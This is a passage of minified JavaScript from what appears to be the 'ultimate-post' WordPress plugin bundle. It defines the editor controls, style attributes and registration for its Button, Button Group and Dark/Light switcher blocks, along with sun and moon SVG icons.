0}),s&&(0,a.createElement)("div",{className:"ultp-btnIcon-wrap"},"_ultp_btn_ic_"+u+"_ultp_btn_ic_end_"),p&&(0,a.createElement)("div",{className:"ultp-button-text",dangerouslySetInnerHTML:{__html:c}}))}},52441:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"button",title:__("Button","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"layout",block:"button",key:"layout",label:__("Style","ultimate-post"),options:[{img:"assets/img/layouts/button/layout1.svg",label:__("Layout 1","ultimate-post"),value:"layout1"},{img:"assets/img/layouts/button/layout2.svg",label:__("Layout 2","ultimate-post"),value:"layout2"},{img:"assets/img/layouts/button/layout3.svg",label:__("Layout 3","ultimate-post"),value:"layout3"},{img:"assets/img/layouts/button/layout4.svg",label:__("Layout 4","ultimate-post"),value:"layout4"}]}},{position:2,data:{type:"select",key:"btnSize",label:__("Button Size","ultimate-post"),options:[{value:"sm",label:__("Small","ultimate-post")},{value:"md",label:__("Medium","ultimate-post")},{value:"lg",label:__("Large","ultimate-post")},{value:"xl",label:__("Extra Large","ultimate-post")},{value:"custom",label:__("Custom","ultimate-post")}]}},{position:3,data:{type:"dimension",key:"btnBgCustomSize",step:1,unit:!0,responsive:!0,label:__("Button Custom Size","ultimate-post")}},{position:4,data:{type:"linkbutton",key:"btnLink",onlyLink:!0,placeholder:"Enter Button URL",label:__("Button Link","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Text","ultimate-post"),depend:"btntextEnable",include:[{position:1,data:{type:"typography",key:"btnTextTypo",label:__("Text Typography","ultimate-post")}},{position:2,data:{type:"color",key:"btnTextColor",label:__("Text Color","ultimate-post")}},{position:3,data:{type:"color",key:"btnTextHover",label:__("Text Hover Color","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Background","ultimate-post"),include:[{position:1,data:{type:"dimension",key:"btnMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"btnBgColor",label:__("Background Color","ultimate-post")},{type:"border",key:"btnBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"btnRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"btnShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"btnBgHover",label:__("Background Color","ultimate-post")},{type:"border",key:"btnHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"btnHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"btnHoverShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Icon","ultimate-post"),depend:"btnIconEnable",include:[{position:1,data:{type:"icon",key:"btnIcon",label:__("Icon Store","ultimate-post")}},{position:2,data:{type:"toggle",key:"btnIconPosition",label:__("Icon After Text","ultimate-post")}},{position:3,data:{type:"range",key:"btnIconSize",min:0,max:300,step:1,responsive:!0,label:__("Icon Size","ultimate-post")}},{position:4,data:{type:"range",key:"btnIconGap",min:0,max:300,step:1,responsive:!0,label:__("Space Between Icon and Text","ultimate-post")}},{position:5,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"btnIconColor",label:__("Icon Color","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"btnIconHoverColor",label:__("Icon Color","ultimate-post")}]}]}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e})))},11359:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},layout:{type:"string",default:"layout1"},btnText:{type:"string",default:""},btntextEnable:{type:"boolean",default:!0},btnTextTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:"",weight:500},style:[{selector:"{{ULTP}} .ultp-button-text"}]},btnTextColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-button-text { color:{{btnTextColor}} } "}]},btnTextHover:{type:"string",default:"",style:[{selector:"{{ULTP}}:hover .ultp-button-text { color:{{btnTextHover}} } "}]},btnLink:{type:"object",default:""},btnLinkTarget:{type:"string",default:"_self"},btnLinkNoFollow:{type:"boolean",default:!1},btnLinkSponsored:{type:"boolean",default:!1},btnLinkDownload:{type:"boolean",default:!1},btnSize:{type:"string",default:"custom",style:[{depends:[{key:"btnSize",condition:"==",value:"custom"}]},{depends:[{key:"btnSize",condition:"==",value:"xl"}],selector:"{{ULTP}} { padding: 20px 40px !important; }"},{depends:[{key:"btnSize",condition:"==",value:"lg"}],selector:"{{ULTP}} { padding: 10px 20px !important; }"},{depends:[{key:"btnSize",condition:"==",value:"md"}],selector:"{{ULTP}} { padding: 8px 16px !important; }"},{depends:[{key:"btnSize",condition:"==",value:"sm"}],selector:"{{ULTP}} { padding: 6px 12px !important; }"}]},btnBgCustomSize:{type:"object",default:{lg:{top:"15",bottom:"15",left:"30",right:"30",unit:"px"}},style:[{depends:[{key:"btnSize",condition:"==",value:"custom"}],selector:"{{ULTP}} { padding:{{btnBgCustomSize}} !important; }"}]},btnMargin:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} { margin:{{btnMargin}}; }"}]},btnBgColor:{type:"object",default:{openColor:0,type:"color",color:"",gradient:{}},style:[{selector:".ultp-anim-none {{ULTP}}.wp-block-ultimate-post-button,\n            .ultp-anim-style1 {{ULTP}}.wp-block-ultimate-post-button, \n            .ultp-anim-style2 {{ULTP}}.wp-block-ultimate-post-button:before, \n            .ultp-anim-style3 {{ULTP}}.wp-block-ultimate-post-button, \n            .ultp-anim-style4 {{ULTP}}.wp-block-ultimate-post-button"}]},btnBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:".wp-block-ultimate-post-button-group .ultp-button-wrapper \n            {{ULTP}}.wp-block-ultimate-post-button"}]},btnRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:".wp-block-ultimate-post-button-group .ultp-button-wrapper \n            {{ULTP}}.wp-block-ultimate-post-button { border-radius:{{btnRadius}}; }"}]},btnShadow:{type:"object",default:{openShadow:0,width:{top:3,right:3,bottom:0,left:0},color:"#FFB714"},style:[{selector:".wp-block-ultimate-post-button-group .ultp-button-wrapper \n            {{ULTP}}.wp-block-ultimate-post-button"}]},btnBgHover:{type:"object",default:{openColor:0,type:"color",color:"",gradient:{}},style:[{selector:".ultp-anim-none {{ULTP}}.wp-block-ultimate-post-button:before, \n            .ultp-anim-style1 {{ULTP}}.wp-block-ultimate-post-button:before, \n            .ultp-anim-style2 {{ULTP}}.wp-block-ultimate-post-button, \n            .ultp-anim-style3 {{ULTP}}.wp-block-ultimate-post-button:before, \n            .ultp-anim-style4 {{ULTP}}.wp-block-ultimate-post-button:before"}]},btnHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:".wp-block-ultimate-post-button-group .ultp-button-wrapper \n            {{ULTP}}.wp-block-ultimate-post-button:hover"}]},btnHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:".wp-block-ultimate-post-button-group .ultp-button-wrapper {{ULTP}}.wp-block-ultimate-post-button:hover { border-radius:{{btnHoverRadius}}; }"}]},btnHoverShadow:{type:"object",default:{openShadow:0,width:{top:3,right:3,bottom:0,left:0},color:"#FFB714"},style:[{selector:".wp-block-ultimate-post-button-group .ultp-button-wrapper {{ULTP}}.wp-block-ultimate-post-button:hover"}]},btnIconEnable:{type:"boolean",default:!1},btnIcon:{type:"string",default:"arrow_right_circle_line"},btnIconPosition:{type:"boolean",default:!1,style:[{depends:[{key:"btnIconPosition",condition:"==",value:!1}],selector:"{{ULTP}} { flex-direction: row }"},{depends:[{key:"btnIconPosition",condition:"==",value:!0}],selector:"{{ULTP}} { flex-direction: row-reverse }"}]},btnIconSize:{type:"object",default:{lg:"17",unit:"px"},style:[{selector:"{{ULTP}} .ultp-btnIcon-wrap svg { height: {{btnIconSize}}; width: {{btnIconSize}}; }"}]},btnIconGap:{type:"object",default:{lg:"12",unit:"px"},style:[{selector:"{{ULTP}} { gap: {{btnIconGap}}; }"}]},btnIconColor:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} > .ultp-btnIcon-wrap svg { color:{{btnIconColor}}; } "}]},btnIconHoverColor:{type:"string",default:"#f2f2f2",style:[{selector:"{{ULTP}}:hover > .ultp-btnIcon-wrap svg { color:{{btnIconHoverColor}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"div:has( > {{ULTP}}) {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"div:has( > {{ULTP}}) {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"div:has( > {{ULTP}}) {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]},...l(69735).KF}},47795:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294),i=l(69735),n=l(83245);const r=[{attributes:{...l(11359).Z},save({attributes:e}){const{blockId:t,advanceId:l,layout:r,btnIconEnable:s,btntextEnable:p,btnText:c,btnIcon:u,btnLink:d,btnLinkTarget:m,btnLinkDownload:g,btnLinkNoFollow:y,btnLinkSponsored:b,version:v,dcEnabled:h}=e;let f="noopener";f+=y?" nofollow":"",f+=b?" sponsored":"";const k={};return(0,i.o6)()&&h?(k.href="#",k.target=m):d.url&&(k.href=d.url,k.target=m),(0,a.createElement)("a",(0,o.Z)({},l&&{id:l},{className:`ultp-block-${t} ultp-button-${r}`},k,{rel:f,download:g&&"download"}),s&&(0,a.createElement)("div",{className:"ultp-btnIcon-wrap"},n.ZP[u]),p&&(0,a.createElement)("div",{className:"ultp-button-text",dangerouslySetInnerHTML:{__html:c}}))}}]},5109:(e,t,l)=>{"use strict";var o=l(67294),a=l(31400),i=l(55790),n=l(11359),r=l(4405),s=l(47795);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;p(r,{parent:["ultimate-post/button-group"],icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/button.svg",alt:"button svg"}),attributes:n.Z,supports:{reusable:!1,html:!1},edit:a.Z,save:i.Z,deprecated:s.Z})},24072:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(77750),n=l(63133),r=l(88309),s=l(14331);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/button-block/","block_docs");p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/button-group.svg",alt:"button group"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Create & customize multiple button-styles","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/button.svg"}},edit:i.Z,save:n.Z})},90466:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(67294),a=l(53049),i=l(99838),n=l(92637),r=l(82044),s=l(55404);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{useState:u,useEffect:d,Fragment:m}=wp.element,{getBlockAttributes:g,getBlockRootClientId:y}=wp.data.select("core/block-editor");function b(e){const[t,l]=u("Content"),{setAttributes:b,name:v,clientId:h,className:f,attributes:k,attributes:{blockId:w,previewImg:x,advanceId:T,layout:_,iconType:C,reverseSwitcher:E,lightText:S,darkText:P,enableText:L,textAppears:I,previewDark:B,currentPostId:U,blockPubDate:M}}=e;d((()=>{const e=h.substr(0,6),t=g(y(h));(0,a.qi)(b,t,U,h),w?w&&w!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||b({blockId:e})):b({blockId:e}),"empty"==M&&b({blockPubDate:(new Date).toISOString()})}),[h]);const A={setAttributes:b,name:v,attributes:k,setSection:l,section:t,clientId:h};let H;if(w&&(H=(0,i.Kh)(k,"ultimate-post/dark-light",w,(0,a.k0)())),x)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:x});const N=c({...T&&{id:T},className:`ultp-block-${w} ${f}`});return(0,o.createElement)(m,null,(0,o.createElement)(p,null,(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"dark-light-setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:5,data:{type:"layout",block:"dark-light",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/dark_light/dark1.svg",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/dark_light/dark2.svg",label:"Layout 2",value:"layout2",pro:!1},{img:"assets/img/layouts/dark_light/dark3.svg",label:"Layout 3",value:"layout3",pro:!1},{img:"assets/img/layouts/dark_light/dark4.svg",label:"Layout 4",value:"layout4",pro:!1},{img:"assets/img/layouts/dark_light/dark5.svg",label:"Layout 5",value:"layout5",pro:!1},{img:"assets/img/layouts/dark_light/dark6.svg",label:"Layout 6",value:"layout6",pro:!1},{img:"assets/img/layouts/dark_light/dark7.svg",label:"Layout 7",value:"layout7",pro:!1}]}},{position:6,data:{type:"toggle",key:"previewDark",label:__("Preview Dark Design","ultimate-post")}},{position:10,data:{type:"group",key:"iconType",justify:!0,label:__("Icon Type","ultimate-post"),options:[{value:"line",label:__("Line","ultimate-post")},{value:"solid",label:__("Solid","ultimate-post")}]}},{position:15,data:{type:"range",key:"iconSize",min:10,max:300,step:1,responsive:!1,label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"toggle",key:"reverseSwitcher",label:__("Reverse Switcher","ultimate-post")}},{position:25,data:{type:"toggle",key:"enableText",label:__("Enable Text","ultimate-post")}},{position:26,data:{type:"select",key:"textAppears",label:__("Text Appears","ultimate-post"),options:[{value:"left",label:__("Selected (Left)","ultimate-post")},{value:"right",label:__("Selected (Right)","ultimate-post")},{value:"both",label:__("Both","ultimate-post")}]}},{position:30,data:{type:"text",key:"lightText",label:__("Light Mode Text","ultimate-post")}},{position:35,data:{type:"text",key:"darkText",label:__("Dark Mode Text","ultimate-post")}},{position:40,data:{type:"typography",key:"textTypo",label:__("Text Typography","ultimate-post")}},{position:45,data:{type:"range",key:"textSwictherGap",min:0,max:300,step:1,responsive:!1,label:__("Text to Switcher Gap","ultimate-post")}},{position:50,data:{type:"separator",label:__("Switcher Color","ultimate-post")}},{position:55,data:{type:"tab",content:[{name:"light",title:__("Light Mode","ultimate-post"),options:[{type:"color",key:"lightTextColor",label:__("Light Color","ultimate-post")},{type:"color",key:"lightIconColor",label:__("Icon Color","ultimate-post")},{type:"color2",key:"lightIconBg",label:__("Icon Background Color","ultimate-post")},{type:"color2",key:"switcherBg",label:__("Background Color","ultimate-post")},{type:"border",key:"switcherBorder",label:__("Border","ultimate-post")},{type:"boxshadow",key:"switcherShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]},{name:"dark",title:__("Dark Mode","ultimate-post"),options:[{type:"color",key:"darkTextColor",label:__("Dark Color","ultimate-post")},{type:"color",key:"lightIconColorDark",label:__("Icon Color","ultimate-post")},{type:"color2",key:"lightIconBgDark",label:__("Icon Background Color","ultimate-post")},{type:"color2",key:"switcherBgDark",label:__("Background Color","ultimate-post")},{type:"border",key:"switcherBorderDark",label:__("Border","ultimate-post")},{type:"boxshadow",key:"switcherShadowDark",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]}]}}],initialOpen:!0,store:A})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:A}),(0,o.createElement)(a.Mg,{store:A}),(0,o.createElement)(a.iv,{store:A})))),(0,o.createElement)("div",N,H&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:H}}),(0,o.createElement)("div",{className:"ultp-dark-light-block-wrapper ultp-block-wrapper"},!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-pro-helper"},(0,o.createElement)("div",{className:"ultp-pro-helper__upgrade"},(0,o.createElement)("span",null,"To Unlock Dark Light Block"),(0,o.createElement)("a",{className:"ultp-upgrade-pro",href:(0,r.Z)({utmKey:"editor_darklight"}),target:"_blank",rel:"noreferrer"}," ","Upgrade to Pro"," "))),(0,o.createElement)("div",{className:`ultp-dark-light-block-wrapper-content ${_}`},B?(0,o.createElement)("div",{className:"ultp-dl-after-before-con ultp-dl-dark "+(E?"ultp-dl-reverse":"")},L&&"layout7"!=_&&["left","both"].includes(I)&&(0,o.createElement)("div",{className:"ultp-dl-before-after-text "+("both"!=I?"darkText":"lightText")},"both"!=I?P:S),(0,o.createElement)("div",{className:"ultp-dl-con ultp-dark-con "+(E?"ultp-dl-reverse":"")},["layout5","layout6","layout7"].includes(_)&&(0,o.createElement)("div",{className:"ultp-dl-text darkText"},"layout5"==_&&(0,o.createElement)("div",{className:"ultp-dl-democircle ultphidden"}),"layout6"==_&&(0,o.createElement)("div",{className:"ultp-dl-democircle"}),"layout7"==_&&P),(0,o.createElement)("div",{className:"ultp-dl-svg-con"},(0,o.createElement)("div",{className:"ultp-dl-svg"},s.Z["line"==C?"moon_line":"moon"]))),L&&"layout7"!=_&&["right","both"].includes(I)&&(0,o.createElement)("div",{className:"ultp-dl-before-after-text darkText"},P)):(0,o.createElement)("div",{className:"ultp-dl-after-before-con ultp-dl-light "+(E?"ultp-dl-reverse":"")},L&&"layout7"!=_&&["left","both"].includes(I)&&(0,o.createElement)("div",{className:"ultp-dl-before-after-text lightText"},S),(0,o.createElement)("div",{className:"ultp-dl-con ultp-light-con "+(E?"ultp-dl-reverse":"")},(0,o.createElement)("div",{className:"ultp-dl-svg-con"},(0,o.createElement)("div",{className:"ultp-dl-svg"},s.Z["line"==C?"sun_line":"sun"])),["layout5","layout6","layout7"].includes(_)&&(0,o.createElement)("div",{className:"ultp-dl-text lightText"},"layout5"==_&&(0,o.createElement)("div",{className:"ultp-dl-democircle ultphidden"}),"layout6"==_&&(0,o.createElement)("div",{className:"ultp-dl-democircle"}),"layout7"==_&&S)),L&&"layout7"!=_&&["right","both"].includes(I)&&(0,o.createElement)("div",{className:"ultp-dl-before-after-text "+("both"!=I?"lightText":"darkText")},"both"!=I?S:P))))))}},732:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},blockPubDate:{type:"string",default:"empty"},previewImg:{type:"string",default:""},previewDark:{type:"boolean",default:!1},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},iconType:{type:"string",default:"solid"},reverseSwitcher:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"==",value:"layout5"}]},{depends:[{key:"layout",condition:"==",value:"layout6"}]},{depends:[{key:"layout",condition:"==",value:"layout7"}]}]},iconSize:{type:"string",default:"24",style:[{selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-svg-con svg,\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-democircle { height: {{iconSize}}px; width: {{iconSize}}px; }"},{depends:[{key:"layout",condition:"==",value:"layout1"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-svg-con svg { height: calc({{iconSize}}px*4/6); width:calc({{iconSize}}px*4/6); }\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con { padding: calc({{iconSize}}px/3) {{iconSize}}px ; border-radius: {{iconSize}}px;  }"},{depends:[{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con { padding: calc({{iconSize}}px/3); border-radius: 100%;  }"},{depends:[{key:"layout",condition:"==",value:"layout4"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con { padding: {{iconSize}}px calc({{iconSize}}px/3); border-radius: {{iconSize}}px;  }"},{depends:[{key:"layout",condition:"==",value:"layout5"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-svg-con svg { height: calc({{iconSize}}px*4/6); width:calc({{iconSize}}px*4/6); }\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con { gap: calc({{iconSize}}px/2);  padding: calc({{iconSize}}px/6); border-radius: {{iconSize}}px; }\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con .ultp-dl-svg { padding: calc({{iconSize}}px/6); border-radius: {{iconSize}}px; }"},{depends:[{key:"layout",condition:"==",value:"layout6"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con { gap: calc({{iconSize}}px/2);  padding: calc({{iconSize}}px/6); border-radius: {{iconSize}}px; }"},{depends:[{key:"layout",condition:"==",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-svg-con svg { height: calc({{iconSize}}px*4/6); width:calc({{iconSize}}px*4/6); }\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con { padding: calc({{iconSize}}px/6); border-radius: {{iconSize}}px; }\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con .ultp-dl-svg { padding: calc({{iconSize}}px/6); border-radius: {{iconSize}}px; }\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con .ultp-dl-text {margin: 0px calc({{iconSize}}px/2); }"}]},enableText:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"!=",value:"layout7"}]}]},textAppears:{type:"string",default:"both",style:[{depends:[{key:"layout",condition:"!=",value:"layout7"},{key:"enableText",condition:"==",value:!0}]}]},lightText:{type:"string",default:"Light Mode",style:[{depends:[{key:"enableText",condition:"==",value:!0}]},{depends:[{key:"layout",condition:"==",value:"layout7"}]}]},darkText:{type:"string",default:"Dark Mode",style:[{depends:[{key:"enableText",condition:"==",value:!0}]},{depends:[{key:"layout",condition:"==",value:"layout7"}]}]},textTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"14",unit:"px"},decoration:"none",family:"",weight:400},style:[{depends:[{key:"enableText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-before-after-text"},{depends:[{key:"layout",condition:"==",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-text"}]},textSwictherGap:{type:"string",default:"10",style:[{depends:[{key:"enableText",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-after-before-con { gap: {{textSwictherGap}}px; }"}]},lightTextColor:{type:"string",default:"#2E2E2E",style:[{depends:[{key:"enableText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-light .ultp-dl-before-after-text.lightText { color: {{lightTextColor}}; }"},{depends:[{key:"textAppears",condition:"==",value:"both"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-light .ultp-dl-before-after-text.darkText { color: {{lightTextColor}}; opacity: 0.4; }"},{depends:[{key:"layout",condition:"==",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-light .ultp-dl-text.lightText { color: {{lightTextColor}}; }"}]},lightIconColor:{type:"string",default:"#2E2E2E",style:[{selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-light-con svg { color: {{lightIconColor}}; }"}]},lightIconBg:{type:"object",default:{openColor:1,type:"color",color:"#9A9A9A",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"layout",condition:"==",value:"layout5"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-light-con .ultp-dl-svg"},{depends:[{key:"layout",condition:"==",value:"layout6"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-light-con .ultp-dl-democircle"},{depends:[{key:"layout",condition:"==",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-light-con .ultp-dl-svg"}]},switcherBg:{type:"object",default:{openColor:1,type:"color",color:"#C3C3C3",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con.ultp-light-con"}]},switcherBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#9A9A9A"},style:[{depends:[{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con.ultp-light-con"}]},switcherShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con.ultp-light-con"}]},darkTextColor:{type:"string",default:"#F4F4F4",style:[{depends:[{key:"enableText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-dark .ultp-dl-before-after-text.darkText { color: {{darkTextColor}}; }"},{depends:[{key:"textAppears",condition:"==",value:"both"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-dark .ultp-dl-before-after-text.lightText { color: {{darkTextColor}}; opacity: 0.4; }"},{depends:[{key:"layout",condition:"==",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-dark .ultp-dl-text.darkText { color: {{darkTextColor}}; }"}]},lightIconColorDark:{type:"string",default:"#F4F4F4",style:[{selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dark-con svg { color: {{lightIconColorDark}}; }"}]},lightIconBgDark:{type:"object",default:{openColor:1,type:"color",color:"#9D9D9D",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"layout",condition:"==",value:"layout5"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dark-con .ultp-dl-svg"},{depends:[{key:"layout",condition:"==",value:"layout6"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dark-con .ultp-dl-democircle"},{depends:[{key:"layout",condition:"==",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dark-con .ultp-dl-svg"}]},switcherBgDark:{type:"object",default:{openColor:1,type:"color",color:"#646464",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con.ultp-dark-con"}]},switcherBorderDark:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#9D9D9D"},style:[{depends:[{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con.ultp-dark-con"}]},switcherShadowDark:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con.ultp-dark-con"}]},...(0,l(92165).t)(["advanceAttr"])}},55404:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294);const a={};a.moon=(0,o.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,o.createElement)("path",{d:"M22 14.27A10.14 10.14 0 1 1 9.73 2 8.84 8.84 0 0 0 22 14.27Z"})),a.moon_line=(0,o.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M8.17 4.53A9.54 9.54 0 0 0 19.5 15.69a8.26 8.26 0 0 1-7.76 4.29 8.36 8.36 0 0 1-7.71-7.7 8.23 8.23 0 0 1 4.15-7.76m1-2.52c-.16 0-.32.03-.48.09a10.28 10.28 0 0 0 3.56 19.9c4.47 0 8.27-2.85 9.67-6.84a1.36 1.36 0 0 0-1.27-1.82c-.15 0-.31.03-.47.1a7.48 7.48 0 0 1-3.41.43 7.59 7.59 0 0 1-6.33-10.04A1.36 1.36 0 0 0 9.17 2Z"})),a.sun=(0,o.createElement)("svg",{viewBox:"0 0 24 24"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M12 18.36a6.36 6.36 0 1 0 0-12.72 6.36 6.36 0 0 0 0 12.72ZM12.98.96V2.8c0 .53-.43.95-.97.95h-.02a.96.96 0 0 1-.97-.95V.96c0-.53.43-.96.96-.96h.05c.53 0 .96.43.96.96ZM4.89 3.5l1.3 1.3c.38.38.37.98 0 1.36h-.01l-.01.02a.96.96 0 0 1-1.37 0l-1.3-1.3a.96.96 0 0 1 0-1.35l.04-.04a.96.96 0 0 1 1.35 0ZM.96 11.02H2.8c.53 0 .95.43.95.97v.02c0 .53-.42.97-.95.97H.96a.95.95 0 0 1-.96-.96v-.05c0-.53.43-.96.96-.96ZM3.5 19.11l1.3-1.3a.96.96 0 0 1 1.36 0v.01l.02.01c.38.38.39.99 0 1.37l-1.3 1.3a.96.96 0 0 1-1.35 0l-.04-.04a.96.96 0 0 1 0-1.35ZM11.02 23.04V21.2c0-.53.43-.95.97-.95h.02c.53 0 .97.42.97.95v1.84c0 